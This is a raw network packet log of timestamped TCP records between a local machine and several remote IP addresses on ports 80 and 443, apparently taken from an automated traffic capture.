                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.051049948 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.051064014 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.051088095 CET4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.051090956 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.051115036 CET4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.051136971 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.051137924 CET4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.051188946 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.051212072 CET4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.051232100 CET4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.051243067 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.051256895 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.051270008 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.051292896 CET4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.051305056 CET4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.051317930 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.051331043 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.051343918 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.051363945 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.051369905 CET4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.051390886 CET4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.051414967 CET4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.065387964 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.065444946 CET4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.065516949 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.065546036 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.065608025 CET4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.090754986 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.090771914 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.090827942 CET4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.090864897 CET4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.105236053 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.105251074 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.105263948 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.105310917 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.105324984 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.105326891 CET4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.105370998 CET4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.115216970 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.115231037 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.115242958 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.115283012 CET4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.115297079 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.115319967 CET4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.115350008 CET4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.119908094 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.119925022 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.119962931 CET4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.119982004 CET4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.125319958 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.125334978 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.125376940 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.125386000 CET4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.125421047 CET4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.135013103 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.135068893 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.135067940 CET4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.135113001 CET4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.135117054 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.137442112 CET4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.137613058 CET4973780192.168.2.678.89.158.42
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.145921946 CET44349738104.105.90.131192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.145992994 CET49738443192.168.2.6104.105.90.131
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.312037945 CET49738443192.168.2.6104.105.90.131
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.312071085 CET44349738104.105.90.131192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.312402010 CET44349738104.105.90.131192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.312454939 CET49738443192.168.2.6104.105.90.131
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.317576885 CET49738443192.168.2.6104.105.90.131
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.364228010 CET44349738104.105.90.131192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.397520065 CET804973778.89.158.42192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.565409899 CET44349738104.105.90.131192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.565433979 CET44349738104.105.90.131192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.565458059 CET44349738104.105.90.131192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.565479040 CET49738443192.168.2.6104.105.90.131
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.565507889 CET44349738104.105.90.131192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.565524101 CET49738443192.168.2.6104.105.90.131
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.565562010 CET49738443192.168.2.6104.105.90.131
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.667946100 CET44349738104.105.90.131192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.667987108 CET44349738104.105.90.131192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.668015957 CET49738443192.168.2.6104.105.90.131
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.668025970 CET44349738104.105.90.131192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.668060064 CET49738443192.168.2.6104.105.90.131
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.668083906 CET49738443192.168.2.6104.105.90.131
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.685492992 CET44349738104.105.90.131192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.685525894 CET44349738104.105.90.131192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.685564995 CET49738443192.168.2.6104.105.90.131
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.685574055 CET44349738104.105.90.131192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.685586929 CET44349738104.105.90.131192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.685600042 CET49738443192.168.2.6104.105.90.131
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.685621023 CET49738443192.168.2.6104.105.90.131
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.713742971 CET49738443192.168.2.6104.105.90.131
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.713754892 CET44349738104.105.90.131192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.916234970 CET49741443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.916260958 CET4434974178.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.916333914 CET49741443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.918562889 CET49741443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:38.918575048 CET4434974178.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:39.520200968 CET4434974178.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:39.520311117 CET49741443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:39.530406952 CET49741443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:39.530416012 CET4434974178.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:39.530663967 CET4434974178.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:39.530724049 CET49741443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:39.531259060 CET49741443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:39.576232910 CET4434974178.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:39.958298922 CET4434974178.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:39.958370924 CET4434974178.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:39.958372116 CET49741443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:39.959017038 CET49741443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:39.959824085 CET49741443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:39.959836006 CET4434974178.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:39.979909897 CET49743443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:39.979934931 CET4434974378.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:39.980001926 CET49743443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:39.980485916 CET49743443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:39.980496883 CET4434974378.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:40.361939907 CET4434974378.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:40.362006903 CET49743443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:40.403187990 CET49743443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:40.403197050 CET4434974378.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:40.405304909 CET49743443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:40.405309916 CET4434974378.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:41.045808077 CET4434974378.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:41.045888901 CET4434974378.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:41.045945883 CET49743443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:41.058181047 CET49743443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:41.058193922 CET4434974378.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:41.224447012 CET49745443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:41.224497080 CET4434974578.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:41.224567890 CET49745443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:41.225022078 CET49745443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:41.225034952 CET4434974578.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:41.605142117 CET4434974578.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:41.605197906 CET49745443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:41.616892099 CET49745443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:41.616902113 CET4434974578.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:41.618500948 CET49745443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:41.618505955 CET4434974578.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:42.302257061 CET4434974578.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:42.302285910 CET4434974578.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:42.302350044 CET4434974578.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:42.302366018 CET49745443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:42.302385092 CET49745443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:42.312942982 CET49745443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:42.312963963 CET4434974578.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:42.391005993 CET49746443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:42.391047955 CET4434974678.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:42.391170979 CET49746443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:42.420449972 CET49746443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:42.420464039 CET4434974678.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:42.800676107 CET4434974678.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:42.800838947 CET49746443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:42.885606050 CET49746443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:42.885629892 CET4434974678.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:42.887665033 CET49746443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:42.887670994 CET4434974678.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:43.507217884 CET4434974678.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:43.507240057 CET4434974678.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:43.507277966 CET49746443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:43.507292032 CET4434974678.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:43.507302999 CET49746443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:43.507340908 CET49746443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:43.507353067 CET4434974678.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:43.507397890 CET49746443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:43.515724897 CET49746443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:43.515738010 CET4434974678.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:44.082089901 CET49748443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:44.082110882 CET4434974878.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:44.082174063 CET49748443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:44.093379021 CET49748443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:44.093389988 CET4434974878.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:44.473310947 CET4434974878.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:44.473714113 CET49748443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:44.516097069 CET49748443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:44.516104937 CET4434974878.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:44.517961025 CET49748443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:44.517966032 CET4434974878.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:44.518008947 CET49748443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:44.518018961 CET4434974878.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:45.257780075 CET4434974878.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:45.257846117 CET49748443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:45.257863045 CET4434974878.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:45.257874966 CET4434974878.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:45.257925034 CET49748443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:45.257932901 CET49748443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:45.774629116 CET49748443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:45.774642944 CET4434974878.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:46.441648006 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:46.441674948 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:46.441792965 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:46.579847097 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:46.579865932 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:46.960829020 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:46.960891962 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:46.973474026 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:46.973485947 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:46.975837946 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:46.975851059 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.572360039 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.572385073 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.572401047 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.572416067 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.572431087 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.572458982 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.572464943 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.572488070 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.572509050 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.656270027 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.656286955 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.656338930 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.656351089 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.656379938 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.656399965 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.778995991 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.779019117 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.779078007 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.779103994 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.779117107 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.780633926 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.862426996 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.862471104 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.862535954 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.862565041 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.862584114 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.862623930 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.926110029 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.926136971 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.926178932 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.926203012 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.926218033 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.926263094 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.971810102 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.971832991 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.971875906 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.971894026 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.971911907 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:47.971930981 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.008739948 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.008759975 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.008836031 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.008858919 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.008903027 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.048423052 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.048444986 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.048548937 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.048568010 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.048629045 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.079271078 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.079288006 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.079411983 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.079435110 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.079477072 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.116210938 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.116239071 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.116389036 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.116411924 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.116461039 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.147581100 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.147599936 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.147700071 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.147730112 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.147775888 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.169152975 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.169172049 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.169249058 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.169287920 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.169331074 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.190614939 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.190633059 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.190727949 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.190758944 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.190881014 CET49750443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.211420059 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.211460114 CET4434975078.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:48.211493969 CET49750443192.168.2.678.46.229.36
